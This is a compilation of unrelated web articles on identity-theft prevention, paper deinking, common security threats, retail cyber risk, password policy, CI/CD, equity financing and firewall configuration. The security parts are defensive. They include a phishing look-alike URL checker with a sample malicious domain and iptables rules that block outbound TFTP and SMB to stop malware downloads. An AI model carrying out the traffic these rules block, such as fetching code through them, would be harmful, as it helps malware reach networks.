- Protect your documents. Protect hard copies of sensitive documents, like your Social Security card and birth certificate, by keeping them locked away. Also, dispose of documents with personal data by shredding them. This ensures that dumpster divers can’t access your information. Documents to shred might include invoices, bank statements, medical records, canceled checks, and junk mail with your name, phone number, and address.
- Don’t overshare on social media. Social media is a great way to connect with friends and family, but it can also be a goldmine for identity thieves. Avoid sharing details like your kids’ or pets’ names, which are often used in passwords. Sensitive information, like a home address or birthday, can also be used to build a fake identity. You may want to set your social media accounts to private in addition to limiting what you share.
- Review your credit report. You have the right to one free copy of your credit report every 12 months, which you can request via AnnualCreditReport.com. This provides you with a report from each of the three major credit bureaus. Review the report, verifying personal information, account details, and public records (like bankruptcies or liens) to ensure there isn’t anything suspicious.
- Follow the news. When major corporations are targeted by hackers, they’re required to alert affected consumers. These breaches are also often reported in the media. To take a more proactive approach, though, check out the McAfee blog, which reports on breaches. If a business you use has been affected, change your passwords.
You can further protect yourself with antivirus software like McAfee’s Total Protection plan. This can help protect your devices against spyware and viruses. You can also enhance your network security with a firewall and virtual private network (VPN). A firewall controls traffic on your internet network based on predefined security parameters, while a VPN hides your IP address and other personal data.
Sign up for a protection plan today
Don’t let concerns about identity fraud keep you from enjoying all the conveniences and perks the internet offers. McAfee’s identity theft protection services can help you stay connected while keeping you safe. Tailor your package to your household’s needs to get the safeguards you want, like ID theft coverage, VPN, and 24/7 monitoring. Our Total Protection plan also comes with $1 million in identity theft coverage to cover qualifying losses and hands-on support to help you reclaim your identity.
With McAfee by your side, you can stay online confidently.
DEINKING OF PAPER
Most people practice some recycling at home, and an increasing number of businesses are making it a point to recycle whenever possible. Paper recycling is the most common and most accessible recycling program. You have to put the paper into the correct bin and forget it. But what happens next?
How does that 30-page report you shredded, that brochure that came in the mail, or that newspaper that you read last night make it back into the recycling stream as a blank sheet of paper? Where does the ink go? How does it get removed?
Most types of paper intended for recycling will have printing on them and are subject to a deinking step in preparation for producing new paper. The choice of deinking technology depends on the paper type and its intended use.
Before the paper can be deinked, you must turn it back into pulp. Pulping devices chop the paper into smaller pieces. Water and chemicals are added to clean it and ensure the proper pH values.
The pulp slurry then goes to a centrifuge, which separates the denser fiber material from unwanted contaminants.
If you’ve ever done your laundry (and kudos if you’ve never had to), you know that bleach and colored clothing don’t mix. Bleaching agents such as hydrogen peroxide and sodium dithionite get added during the pulping step. Bleaching destroys the colorants in inks and brightens the remaining paper pulp, which is beneficial for recycled pulp used in higher-quality graphic papers.
The most widely used deinking technology is flotation deinking. Ink is removed from the pulp during this process by re-soaking it in a vat of water and applying certain chemicals called surfactants. Air gets introduced into the recovered pulp, and ink particles (and other chemicals) will float and mix with the foam on the water surface. This foam is removed from the vat.
Flotation deinking is used for the deinking of graphic papers such as newsprint and magazine papers and also commonly used as one of the steps for deinking of papers intended for use as hygiene papers (toilet paper, facial tissue, etc.).
Enzymatic deinking uses enzymes in conjunction with flotation deinking to augment the removal of inks. Recycling mills might use enzymatic deinking in place of bleach deinking.
Washing removes inks and other unwanted components (such as mineral fillers) by washing the water-soaked pulp on a wire screen. The pulp fibers are recovered from the screen, and the filtered material is then further treated to remove the unwanted solids. Washing is only effective at removing small-particle-size inks and is not intended for use on heavily or even moderately printed papers.
Washing is most commonly used in the production of hygiene papers because the mineral fillers found in the majority of paper intended for recycling often reduce the quality of the hygiene products and must be removed. Washing is not adequate for most other papers due to the high yield loss during the process.
We face many security threats every day, often without even realizing it, thanks largely to the antivirus software we use. Still, it is worth knowing what threats are out there, because understanding them is the first step to protecting yourself. Security threats and hacking are global issues: even the most secure websites can be attacked and compromised. Here are some of the security threats commonly faced every day.
First comes a technique that is nearly impossible to detect with technology alone: social engineering. It means that an attacker communicates with someone directly, on a social level, and tries to gather information from what that person says or does. A very common variant is carried out over the phone. You get a call at your desk from someone who seems to work at the help desk, perhaps even using the name of a real help desk employee. They chat about your department, mention details they have already gathered (such as where your office is), then invent a problem and explain that they need your username and password to fix it without any disruption. Because the caller sounds legitimate, many people hand over exactly the information the attacker wants. Social engineering can also happen inside the building: someone shows up claiming to be from the telecom company, or to fix the photocopier or some other device. To counter this, make sure procedures are followed, badges are worn, and identification is checked, so that no one gains access to resources they should not have.
The most precious thing on your computer is the data it holds. That data is extremely valuable, and you usually do not want others to take it or even see it. Yet attacks have become so advanced that data can be stolen without the attacker ever obtaining a username and password, and without the attacker even being in the building. If you use a laptop in public, someone may simply sit nearby and watch what you do; with no software at all, even a pair of binoculars is enough to see what is on your screen. This is one of the simplest ways to gather information about someone without ever talking to them, and the observer may be sitting right behind you without your knowledge. So stay aware of your surroundings and check whether anyone is watching. Malware, meanwhile, has become far more capable and far more common. It can sit in the background, observe what is going on, and record what is typed, then send those keystrokes to a central server where attackers collect usernames, passwords, and the credentials used to log in to bank accounts. Attackers can also plant software that makes your computer perform tasks for them later: the machine might become a participant in denial-of-service attacks, quietly send out information, or spam email, depending on what the malware is built to do. Some malware even locks the screen and displays a message claiming you have done something illegal and must pay around $200 to unlock it, complete with an address for wiring the money, and frightened victims pay the "penalty."
Another threat, less common than ordinary malware but just as important, is the rootkit, named after the root account in Unix and Linux. Rootkits embed themselves in the operating system kernel, so they do not appear in the task manager or as ordinary files you can inspect, and they can alter what the operating system reports about its own files. That makes them very difficult to find, although antivirus and anti-malware scanners may be able to identify them. Consider how easily something can hide in plain sight: a Windows system folder may hold around 2,000 files totaling 700 megabytes, and a new file added there, especially one given an innocuous name, would likely go unnoticed. Since rootkits are so hard to detect once installed, it is important to keep your operating system patched and up to date so they cannot get in.
There is another way to gather information about someone without installing any software: a technique called phishing, which is a close relative of social engineering. The attacker sends a link to a video or website that, when opened, harvests the victim's data. For example, someone sends you a "funny video," and when you open it, a page asks for your YouTube username and password. It looks like YouTube, but it is actually the attacker's site, and whatever you type is captured. It can get worse: a page may look exactly like the PayPal login, with only the URL changed, so always check the URL to make sure the site is genuine. Sometimes other clues give a fake away, such as misspellings or an image that never loads, leaving you with the feeling that this is not the site you think it is. A more targeted variant is spear phishing, where attackers research specific users and go after them individually. If an organization has a Twitter account, for instance, attackers find out who manages it and send that person spam directing them to log in to what looks like a familiar page, such as Facebook, in order to steal the username and password.
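The "check the URL" advice can even be automated. The sketch below is a simplified illustration in Python (real browsers and mail filters use far more sophisticated checks, and the trusted list here is just an example):

```python
from urllib.parse import urlparse

TRUSTED = {"paypal.com", "youtube.com"}  # example allow-list

def looks_legitimate(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    # Accept the exact domain or a true subdomain of it -- nothing else.
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

print(looks_legitimate("https://www.paypal.com/login"))      # True
print(looks_legitimate("https://paypa1.com.evil.io/login"))  # False
```

Note how the second URL embeds a look-alike domain; matching on the registered domain rather than on substrings is what catches it.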
Shoulder surfing does not involve touching the victim's computer at all. The attacker simply sits behind someone who is using a computer and observes what they are doing; a practiced observer can often tell what is being typed just by watching. So be aware of what is happening around you and whether you are being observed.
Spyware is software similar to other malware. It is used to spy on users and the activities they perform. Even if it cannot capture a password outright, it can reveal which sites someone visits and what their habits are, and therefore hint at what kinds of passwords they might choose.
Viruses are a very common problem these days. A virus is a little piece of code that gets onto the computer and then starts reproducing itself, much like a virus in the human body. It needs a host: once you run a program that carries the virus, the virus executes along with it and spreads through the computer while replicating. Worse, modern viruses can also reproduce themselves across networks, so a single infection can reach other machines over the internet. Some are stealthy: they do nothing visible at first, just sit and wait, so you may not even know they are there. Others are openly destructive, deleting files or driving resource utilization to very high levels. Fortunately, there are many antivirus products that can find and remove viruses, and you should certainly use one to stay safe.
Worms: A worm is self-replicating malware that, unlike a classic virus, does not need a host program to run; it takes care of the process itself. That independence lets it hop around a network and attack many computers in a very short time. Occasionally worms have even been built with good intentions: the Nachi worm, for example, tried to patch computers so that other, malicious worms could not get in.
Trojans: Also called Trojan horses, these are malicious programs disguised as something legitimate. A Trojan does not replicate itself; it relies on the user to run it. Once installed, it can slow the computer's performance, gather information about the user, or quietly leave other malicious software behind after a successful attack, so it is important to find and remove it.
Security threats come in many forms, and each form has its own capabilities, which once meant running several tools side by side: antivirus, anti-malware, and anti-rootkit software all at once. Technology has made life easier, and today you can install a single comprehensive security suite and be reasonably confident that you are protected against viruses and other infections. Whatever the form, the purpose of malicious software is either to slow you down or to steal information that may be very important to you.
The retail sector is on the cusp of transformation with advancements in the Internet of Things (IoT), big data, cloud, robotics and artificial intelligence (AI). Consumers are becoming increasingly connected as new sales platforms and marketing techniques flood the industry. However, this plethora of innovation brings with it a darker risk.
Retailers now store more consumer data than ever before across an increasing range of digital platforms, providing cybercriminals with more data to target and more doorways to access them. As retailers invest in technology to collect and exploit new and existing customer data, there is a corresponding rise in the need for them to navigate the regulatory issues unique to this technology and to maintain effective systems and controls to ensure the security of the collected data.
There has been an abundance of change in the retail sector within the last decade. Arguably the most significant of these changes is the evolution of digitalisation.
With the emergence of the Internet of Things and the development of ‘smart’ devices, anything and everything from mobile phones to televisions are now ‘online’. This greater connectivity has led to consumers demanding faster access to a wider variety of products and has provided retailers with the opportunity to offer new sales platforms and more targeted marketing strategies.
Retailers Have Vast Quantities of Data
Retailers have recognised the rise of the digital world and are embracing it. A significant benefit that accompanies this digitalisation is the opportunity to collect and exploit customer data.
Loyalty schemes, software application downloads and online registrations all allow for the collection of vast quantities of data, from names, addresses and telephone numbers to clothes sizes and purchase histories. In return, consumers receive the benefits of personalised advertisements, offers and products to match their preferences.
The analysis of data can also be used to improve the efficiency of the supply chain; this has been seen in the experimental use of Blockchain, through which transactions can be tracked more securely and transparently.
These efficiencies ultimately lead to lower prices for consumers as production costs are reduced. The future prospects are exciting too, with research and development currently taking place in areas such as driverless cars, augmented reality, facial recognition software and robotics. The benefits of which include new opportunities for reduced travel and delivery times, payment transactions, improved safety and greater accuracy and efficiency in manufacturing supply chains.
Whilst these innovations offer great opportunities, the associated collection and storage of data comes with increased risks. Publications by PricewaterhouseCoopers show there was a 30% increase in the prevalence of cyberattacks in 2017 and that cybercrime is the most common type of fraud reported in 2018. In recognition of this growing threat, the UK Government’s National Cyber Security Strategy has committed £1.9 billion of funding to defend against cybercrime for the period 2016-2021. Many large corporations are also taking action, tasking their c-suite executives with responsibility for implementing cybersecurity defence initiatives.
IT infrastructures have become more and more complex in recent years with cloud computing, mobile and remote working. Cybercriminals target weaknesses in the interconnectivity of these networks, with a defect in one device providing a portal to the others. Data breaches are complex affairs, often involving a combination of human factors, hardware devices, exploited configurations or malicious software. Cybercriminals have developed a wide range of methods to access data held by retailers, including web-application attacks; attacks on point-of-sale environments leading to payment card data disclosure; denial-of-service attacks, such as physical disruption to elevators in stores or disruption to online sales platforms; and payment card skimmers, to name a few.
Data breaches have tremendous detrimental effects on retailers, including heavy fines under domestic and European legislation and significant profit losses stemming from the disruption to operations and the loss of customers. The retailer’s brand will be impacted, with the brand name and the breach becoming interlinked.
What can Retailers do to Help Prepare for a Breach?
Adopting a program of Active Cyber Defence by engaging security analysts and implementing security measures to strengthen their systems against attack is a key first step. Data classification schemes and retention programs can increase the visibility of the data held, and the adoption of a data breach plan allowing the retailer to identify any breach and respond to it quickly and effectively is crucial. Engaging in targeted employee training, reducing the complexity of IT systems and investing in regular, ongoing security analysis are also key preventative measures.
If the worst comes to the worst and an attack occurs, some simple steps can help to limit its impact. Change the passwords to accounts which have administration rights or access to sensitive information. Pull the plug of affected PCs, when the attack takes the form of ransomware, in order to avoid the spread of the data breach. Engage security experts as soon as possible, take legal advice on notification requirements and engage PR support to manage any media fallout. And finally, take whatever steps may be necessary to preserve customer trust and loyalty in face of the breach. | <urn:uuid:be6c4668-d977-437d-896f-c53d7c8d82f5> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/cybersecurity/cyber-risk-in-the-retail-sector | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00586.warc.gz | en | 0.937867 | 1,013 | 2.625 | 3 |
Passwords are supposed to be a safeguard, a shield that keeps sensitive information from falling into the wrong hands. But passwords have become a liability, with hackers targeting them in cyberattacks. That is why the National Institute of Standards and Technology is considering an authentication-related tweak to its reference guide.
The agency may eliminate password entropy requirements outlined by the NIST electronic authentication guide 800-63, FedScoop reports. NIST is limiting password access to low-risk assets and is debating whether to permanently terminate passwords because they’re what Paul Grassi, senior standards and technology advisor for the agency’s National Strategy for Trusted Identities in Cyberspace program, calls a “vulnerability.”
“You want to make recommendations that actually eradicate passwords as much as possible and get it to where it belongs: to protect worthless data and as a simple way to gain access to something you’ve been to before, then push the rest of services to two-factor [authentication],” Grassi told FedScoop.
This reinforces the idea that passwords are little more than fences that can be scaled, cut through, or otherwise rendered useless.
Computer users who utilize the same password for multiple accounts or resort to easy-to-remember passwords should take the following into consideration: It’s nearly as easy to crack a password as it is to come up with one. NIST says that any 16-character, human-generated password has 30 bits of entropy, from which there are roughly 1 billion possibilities. Security Intelligence reports that certain password-cracking devices can test more than 300 billion passwords per second.
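The arithmetic behind those figures is straightforward: 30 bits of entropy means 2^30 possible passwords, which the cracking rate quoted above exhausts almost instantly. A quick back-of-the-envelope check in Python:

```python
bits_of_entropy = 30
possibilities = 2 ** bits_of_entropy        # 1,073,741,824, roughly 1 billion
guesses_per_second = 300_000_000_000        # the cracking rate cited above

seconds = possibilities / guesses_per_second
print(f"{possibilities:,} possibilities")
print(f"Exhausted in {seconds * 1000:.1f} ms, worst case")  # about 3.6 ms
```

Every additional bit of entropy doubles the search space, which is why machine-generated secrets and multi-factor methods so decisively outclass human-chosen passwords.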
So what are the alternatives? Is the facial-recognition technology seen in Minority Report the answer? FIDO Alliance Executive Director Brett McDowell explained to FedScoop that authentication methods such as fingerprint- and iris-scanning technology would suffice.
“You don’t type anything in and it’s much more secure because it doesn’t have the vulnerabilities associated with phishing or the execution environment with malware,” McDowell said.
Grassi added that the federal government has shown interest in these upgraded authentication methods. After the OPM breach federal CIO Tony Scott sent an emphatic message about cybersecurity practices, and NIST and the rest of the government are clearly paying attention. | <urn:uuid:73adeefb-829b-4522-bb97-681309837193> | CC-MAIN-2022-40 | https://fedtechmagazine.com/article/2015/11/nist-considers-dropping-use-passwords | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00786.warc.gz | en | 0.936682 | 485 | 2.734375 | 3 |
Flexibility, speed, and quality are the core pillars of modern software development. Increased customer demand and the evolving technological landscape have made software development more complex than ever, making traditional software development lifecycle (SDLC) methods unable to cope with the rapidly changing nature of developments.
Practices like Agile and DevOps have gained popularity in facilitating these changing requirements by bringing flexibility and speed to the development process without sacrificing the overall quality of the end product.
Together, Continuous Integration (CI) and Continuous Delivery (CD) are a key practice in this regard. They allow users to build integrated development pipelines that span from development to production deployments across the software development process. So, what exactly are Continuous Integration and Continuous Delivery? Let's take a look.
What is CI/CD?
CI/CD refers to Continuous Integration and Continuous Delivery. In its simplest form, CI/CD introduces automation and monitoring to the complete SDLC.
- Continuous Integration can be considered the first part of a software delivery pipeline where application code is integrated, built, and tested.
- Continuous Delivery is the second stage of a delivery pipeline where the application is deployed to its production environment to be utilized by the end-users.
Let’s deep dive into CI and CD in the following sections.
What is Continuous Integration?
Modern software development is a team effort with multiple developers working on different areas, features, or bug fixes of a product. All these code changes need to be combined to release a single end product. However, manually integrating all these changes can be a near-impossible task, and there will inevitably be conflicting code changes with developers working on multiple changes.
Continuous Integration offers the ideal solution for this issue by allowing developers to continuously push their code to the version control system (VCS). These changes are validated, and new builds are created from the new code that will undergo automated testing.
This testing will typically include unit and integration tests to ensure that the changes do not cause any issues in the application. It also ensures that all code changes are properly validated, tested, and immediate feedback is provided to the developer from the pipeline in the event of an issue enabling them to fix that issue quickly.
This not only increases the quality of the code but also provides a platform to quickly identify code errors with a shorter automated feedback cycle. Another benefit of Continuous Integration is that it ensures all developers have the latest codebase to work on, as code changes are quickly merged, further mitigating merge conflicts.
The end goal of the continuous integration process is to create a deployable artifact.
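CI servers are normally configured declaratively, but the control flow they execute boils down to something like the following hypothetical Python sketch. The commands, paths, and artifact name are placeholders for whatever your project actually uses:

```python
import hashlib
import subprocess
import sys

def run(stage: str, cmd: list) -> None:
    """Run one pipeline stage; fail fast with immediate feedback."""
    print(f"--- {stage} ---")
    if subprocess.run(cmd).returncode != 0:
        sys.exit(f"{stage} failed: fix the code and push again.")

run("fetch latest merged code", ["git", "pull", "--ff-only"])
run("unit tests", ["pytest", "tests/unit"])
run("integration tests", ["pytest", "tests/integration"])
run("build", ["python", "-m", "build"])  # produces the deployable artifact

# Fingerprint the artifact so later stages can verify they deploy
# exactly what was tested (the path is a placeholder).
with open("dist/app-1.0.tar.gz", "rb") as f:
    print("artifact sha256:", hashlib.sha256(f.read()).hexdigest())
```

The essential property is the fail-fast loop: the first broken stage stops the pipeline and notifies the developer immediately.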
What is Continuous Delivery?
Once a deployable artifact is created, the next stage of the software development process is to deploy this artifact to the production environment. Continuous delivery comes into play to address this need by automating the entire delivery process.
Continuous Delivery is responsible for the application deployment as well as infrastructure and configuration changes, monitoring and maintaining the application. CD can extend its functionality to include operational responsibilities such as infrastructure management, using automation tools such as Terraform, Ansible, Chef, and Puppet.
Continuous Delivery also supports multi-stage deployments where artifacts are moved through different stages like staging, pre-production, and finally to production with additional testing and verifications at each stage. These additional testing and verification further increase the reliability and robustness of the application.
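A multi-stage delivery flow can be pictured as promoting one immutable artifact through successive environments, with a verification gate at each. Here is a schematic Python sketch (the health check is a stub; in practice it would run smoke tests, watch dashboards, or wait for a manual approval):

```python
STAGES = ["staging", "pre-production", "production"]

def healthy(stage: str, artifact: str) -> bool:
    # Placeholder gate: real checks would run smoke tests, compare
    # error rates and latency, or require a human sign-off.
    print(f"verifying {artifact} in {stage} ...")
    return True

def promote(artifact: str) -> None:
    for stage in STAGES:
        print(f"deploying {artifact} to {stage}")
        if not healthy(stage, artifact):
            print(f"rollback: {artifact} failed checks in {stage}")
            return
    print(f"{artifact} is live in production")

promote("app-1.0+sha256.9f2c")
```

Promoting the exact artifact produced by CI, rather than rebuilding at each stage, is what makes the final production deployment trustworthy.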
Why we need CI/CD
CI/CD is the backbone of all modern software developments allowing organizations to develop and deploy software quickly and efficiently. It offers a unified platform to integrate all aspects of the SDLC, including separate tools and platforms from source control, testing tools to infrastructure modification, and monitoring tools.
A properly configured CI/CD pipeline allows organizations to adapt to changing consumer needs and technological innovations easily. In a traditional development strategy, fulfilling changes requested by clients or adapting new technology will be a long-winded process. Moreover, the consumer need may also have shifted when the organization tries to adapt to the change. Approaches like DevOps with CI/CD solve this issue as CI/CD pipelines are much more flexible.
For example: suppose there is a consumer requirement that is not currently addressed with a DevOps approach. In that case, it can be quickly identified, analyzed, developed, and deployed to the software product in a relatively short amount of time without disrupting the normal development flow of the application.
Another aspect is that CI/CD enables quick deployment of even small changes to the end product, quickly addressing user needs. It not only resolves user needs but also provides visibility of the development process to the end-user. End-users can see that the product grows with frequent deployments related to bug fixes or new features.
This is in stark contrast with traditional approaches like the waterfall model, where the end-users only see the final product after the complete development is done.
CI/CD has come a long way since its inception, where it began only as a platform to support application delivery. Now it has evolved to support other aspects, such as:
- Database DevOps, where database changes are continuously delivered.
- GitOps, where infrastructure is defined in a declarative version-controlled manner to be managed via CI/CD pipelines.
Thus, users can integrate almost all aspects of the software delivery into Continuous Integration and Continuous Delivery. Furthermore, CI/CD can also extend itself to DevSecOps, where security testing such as vulnerability scans, configuration policy enforcements, network monitoring, etc., can be directly integrated into CI/CD pipelines.
CI/CD pipeline & workflows
A CI/CD pipeline is a software delivery process created through Continuous Integration and Continuous Delivery platforms. The complexity and the stages of the pipeline vary depending on the development requirements.
Properly setting up a CI/CD pipeline is the key to benefiting from all the advantages offered by CI/CD. One pipeline might have a multi-stage deployment strategy that delivers software as containers to a multi-cloud Kubernetes cluster, and another may be a simple pipeline that builds, tests, and deploys the application as a serverless function.
A typical CI/CD pipeline can be broken down into the following stages:
- Development. This stage is where the development happens, and the code is merged to a version control repository and validated.
- Build. The application is built using the validated code, and this artifact is used for testing.
- Testing. Usually, the built artifact is deployed to a test environment, and extensive tests are carried out to ensure the functionality of the application.
- Deploy. This is the final stage of the pipeline, where the tested application is deployed to the production environment.
All the above stages are continuously monitored for any errors and quickly notified to the relevant parties.
Advantages of Continuous Integration & Delivery
CI/CD undoubtedly increases the speed and the efficiency of the software development process while providing a top-down view of all the tasks involved in the delivery process. On top of that, CI/CD has the following benefits, reaching all aspects of the organization:
- Improve developer and QA productivity by introducing automated validations, builds, and testing
- Save time and resources by automating mundane and repeatable tasks
- Improve overall code quality
- Tighten feedback cycles, since each stage and process in the pipeline is continuously monitored
- Reduce the bugs or defects in the system
- Provide the ability to support other areas of application delivery, such as database and infrastructure changes directly through the pipeline
- Support varying architectures and platforms from traditional server-based deployment to container and serverless architectures
- Ensure the application’s reliability, since continuous monitoring extends into the production environment
CI/CD tools & platforms
When it comes to CI/CD tools and platforms, there are many choices ranging from simple CI/CD platforms to specialized tools that support a specific architecture. There are even tools and services directly available through source control systems. Let’s look at some of the popular CI/CD tools and platforms.
Continuous Integration tools & platforms
- Travis CI
Continuous Delivery tools & platforms
- Octopus Deploy
- Azure DevOps
- Google Cloud Build
- AWS CodeBuild/CodeCommit/CodeDeploy
- GitHub Actions
- GitLab Pipelines
- Bitbucket Pipelines
Summing up CI/CD
Continuous Integration and Continuous Delivery have become an integral part of most software development lifecycles. With continuous development, testing, and deployment, CI/CD has enabled faster, more flexible development without increasing the workload of development, quality assurance, or the operations teams.
Today, CI/CD has evolved to support all aspects of the delivery pipelines, thus also facilitating new paradigms such as GitOps, Database DevOps, DevSecOps, etc.—and we can expect more to come.
BMC supports Enterprise DevOps
From legacy systems to cloud software, BMC supports DevOps across the entire enterprise. Learn more about Enterprise DevOps.
Financing is a hot topic of discussion in today’s world. As people become more aware of the different methods of managing and raising capital, they are starting to explore their options. Anyone with an interest in finance has likely heard of equity financing by now.
Equity financing is a method of raising capital through the sale of shares. To raise cash, the company essentially sells ownership stakes in itself. The money raised can cover short-term needs like bill payments or long-term needs like investment in the company’s growth.
To practice equity financing, companies can sell equity instruments such as common stock, preferred shares, and share warrants. Equity financing is especially crucial during a company's startup stage, when it funds plant assets and early operational expenditures. Investors profit from dividends or when the value of their stock rises.
Some of us might confuse equity financing with debt financing, since companies use both to raise funds, but they are completely different concepts. Debt financing involves borrowing money, mostly in the form of loans.
With debt financing, companies are required to repay the amount borrowed along with interest; equity financing, by contrast, carries no repayment obligation.
Debt financing does have a few advantages over equity financing: the lender has no control over the company’s decisions or operations, and once the loan is repaid, the relationship between the company and the financial institution ends. Equity financing is different. Once a company chooses to raise money by selling shares to investors, it must share its earnings with those investors and consult with them whenever it makes decisions that affect the entire firm.
If a firm sells a percentage of its stock to investors, the only way to get rid of them (and their interest in the company) is to repurchase their shares, which is known as a buy-out. The cost of repurchasing the shares, however, will almost certainly be more than the initial purchase price. Usually, companies use a mix of debt financing and equity financing to raise funds.
Just like debt financing, equity financing has its own advantages and disadvantages. In this article, we discuss how equity financing works and list its sources, advantages, and disadvantages.
How Equity Financing Works
Equity financing involves selling common equity as well as other equity or quasi-equity instruments such as preferred stock, convertible preferred stock, and equity units that comprise common shares and warrants.
As a startup evolves into a full-fledged company, it will typically go through several rounds of equity financing. Because a startup generally attracts different kinds of investors at different phases of its development, it may employ a variety of equity instruments to meet its funding needs.
Consider a practical example. In a startup's early days, angel investors and venture capitalists are usually the first investors. When it comes to investing in new businesses, they prefer convertible preferred shares over common stock, since the former offer more upside potential and some downside protection.
When the firm has developed to the point where it may consider going public, it can offer common stock to institutional and individual investors. If the firm needs more money later, it can turn to secondary equity financing options such as a rights offering or an offering of equity units with warrants attached as an incentive. Let us now define the major sources of equity financing.
Main Sources of Equity Financing
According to CFI, the following are the major sources of equity financing:
Angel investors:
Angel investors are affluent individuals who invest in companies they feel will create better profits in the future. These individuals often bring their business talents, expertise, and connections to the table, which benefits the firm over time.
Crowdfunding platforms:
Crowdfunding platforms allow a large number of people to make modest investments in a firm. Members of the public choose to invest in businesses because they trust in their concepts and expect to see a return on their investment in the future. The individual contributions are added together to reach a target total.
Venture capital firms:
Venture capital firms are groups of investors that make investments in companies they believe will expand rapidly and eventually be listed on stock markets. In comparison to angel investors, they invest larger amounts of money and obtain a larger stake in the firm. Private equity financing is another name for this approach.
Corporate investors:
Corporate investors are major corporations that make investments in private firms to help them raise capital. Typically, the investment is made to form a strategic partnership between the two companies.
Initial public offerings:
An initial public offering (IPO) is a way for more established companies to raise money. An IPO allows a business to raise cash by selling shares to the general public for trading on a stock exchange.
Advantages of Equity Financing
Alternative Funding Source to debt:
Providing an alternative to debt is the main advantage of equity financing. Angel investors, venture capitalists, and crowdfunding platforms can help startups that don't qualify for significant bank loans cover their expenditures, and there is no debt to repay with equity financing.
The company does not have to make monthly loan payments, which is especially significant if it does not produce a profit right away. Because the firm does not have to repay its shareholders, equity financing is seen as less risky than debt financing in this respect.
Typically, investors focus on the long term and do not expect a quick return on their investment. This allows the firm to reinvest its operating cash flow in developing the business instead of devoting it to debt repayment and interest.
Access to capital sources:
The management of a firm can also benefit from equity funding. Some investors are personally driven to contribute to a company's success and want to be involved in its operations.
Their successful histories enable them to offer crucial support in the form of business contacts, managerial knowledge, and access to additional financial sources.
Many angel investors and venture capitalists are willing to help businesses in this way. Such support is especially critical during the early stages of a company's development.
Disadvantages of Equity Financing
Distribution of Ownership:
The major drawback of equity financing is that it requires business owners to relinquish a portion of their ownership and control. If the business becomes lucrative and successful in the future, a portion of the earnings must be distributed to shareholders in the form of dividends.
Many venture funders want a 30% to 50% ownership stake, especially from businesses without a strong financial track record. Many business owners and founders are hesitant to give up so much control of their firm, which restricts their equity funding choices.
Hence, the price of gaining access to all the advantages of equity financing is sharing control of the company.
Lack of tax shields:
In comparison to debt, equity investments provide no tax benefits. Dividends paid to shareholders are not deductible expenses, but interest payments are. The cost of equity financing rises as a result.
In the long run, equity financing is regarded as more expensive than debt financing. This is because investors demand a higher rate of return than lenders. Investors take on substantial risk when funding a business, so they expect a larger return.
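To put hypothetical numbers on the tax-shield point: if a company pays 10% interest on its debt and faces a 30% corporate tax rate, interest deductibility brings the effective after-tax cost of debt down to 10% × (1 − 0.30) = 7%. Dividends enjoy no such deduction, so if equity investors expect a 12% return, the company bears the full 12%, widening the cost gap between the two funding sources.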
Equity financing is a great way to raise funds for the benefit of the company, though there are a few deciding factors the company must weigh before starting. It can be the better option when creditworthiness is an issue.
But the owners of the company will also have to decide whether they are ready to share the control, decision-making, and profits of their company with their equity partners. If the owners believe the company can earn large profits in the future, they may prefer loans they can repay over selling shares.
Network Security Basics
Over the next few months, we’ll be taking a look at the requirements that administrators in certain industries, such as banks, public utilities, and the like, need to consider in order to secure their networks. But before we highlight these industry-specific points, we must first address the general network security requirements that exist in any environment.
To secure modern enterprise networks, administrators have a variety of tasks to perform that have become increasingly complex in recent years. Let’s start with the very basic factors that have been around for years. The first of these is a professional firewall that is precisely tailored to the company’s requirements.
In this context, it is important to know that a firewall alone is far from enough to ensure a sufficient level of security, even in a branch office or a remote office. Nevertheless, the firewall and its configuration still play a central role in the overall security concept.
The firewall is responsible for securing data traffic between the LAN and the WAN and therefore sees virtually all incoming and outgoing traffic. In addition, more and more functions have been added in recent years that go far beyond the original task of a packet filter firewall. Examples include VPN connections for mobile users and remote offices, intrusion prevention systems (IPS), URL filters, and all of the functions associated with the term “next-generation firewall” (NGFW).
The professional configuration of the rules of a packet filter firewall goes far beyond the rule set “Allow all access from the LAN to the Internet” and “Deny all access from the Internet to the LAN” seen in many home routers and often present as the default configuration of professional solutions. For example, in many environments, such as remote offices and branch offices, it can make sense to allow maintenance access from the outside via SSH or similar.
At the same time, it usually also makes sense to prevent access from the LAN to the Internet via protocols that are normally only used within LANs. For example, malware could conceivably use TFTP to download further malicious code from the Internet, an attempt that would fail if the associated transfers were blocked. Protocols for local access to shares, such as SMB/CIFS, should also never be allowed through a firewall, so that the data stored on such shares cannot be accessed from outside.
Admittedly, blocking unneeded services based on protocol and port is not as important today as it used to be, since the majority of data transfers are handled via ports 80 and 443 using HTTP and HTTPS anyway. But as the basis of a secure network, a firewall that only allows absolutely necessary services to pass is still a good solution.
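As an illustration, the rules below sketch how such restrictive filtering might look on a Linux gateway using iptables, assuming eth0 is the WAN interface. The port numbers are the standard ones (TFTP on 69/udp, SMB/CIFS on 445/tcp, NetBIOS on 137-139), but any real rule set must be tailored to the environment.

# Block LAN-only protocols from leaving the network:
iptables -A FORWARD -o eth0 -p udp --dport 69 -j DROP        # TFTP
iptables -A FORWARD -o eth0 -p tcp --dport 445 -j DROP       # SMB/CIFS
iptables -A FORWARD -o eth0 -p tcp --dport 137:139 -j DROP   # NetBIOS over TCP
iptables -A FORWARD -o eth0 -p udp --dport 137:139 -j DROP   # NetBIOS over UDP

# Allow maintenance access from outside only via SSH, deny everything else:
iptables -A FORWARD -i eth0 -p tcp --dport 22 -j ACCEPT
iptables -A FORWARD -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i eth0 -j DROP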
Securing web traffic
As we have just mentioned, most data transmissions today use the Internet protocols HTTP and HTTPS, and the associated ports are open in practically all firewalls. Since a wide variety of data transfers take place this way, for example, access to messengers, cloud storage, or services such as Office 365, not to mention “normal” web surfing, a classic firewall that only classifies data streams by port and protocol has no chance of detecting whether malware is being distributed or data is being stolen via a given connection.
That’s why it’s essential to have a next-generation firewall that closely monitors HTTP and HTTPS transfers. Such products examine the content of the data streams, filter out infected data, analyze user behavior and use predefined rules to decide which transmissions are allowed through and which are not. Once again, administrators should set up the policies as restrictively as possible so that only the data transfers that are actually necessary are allowed.
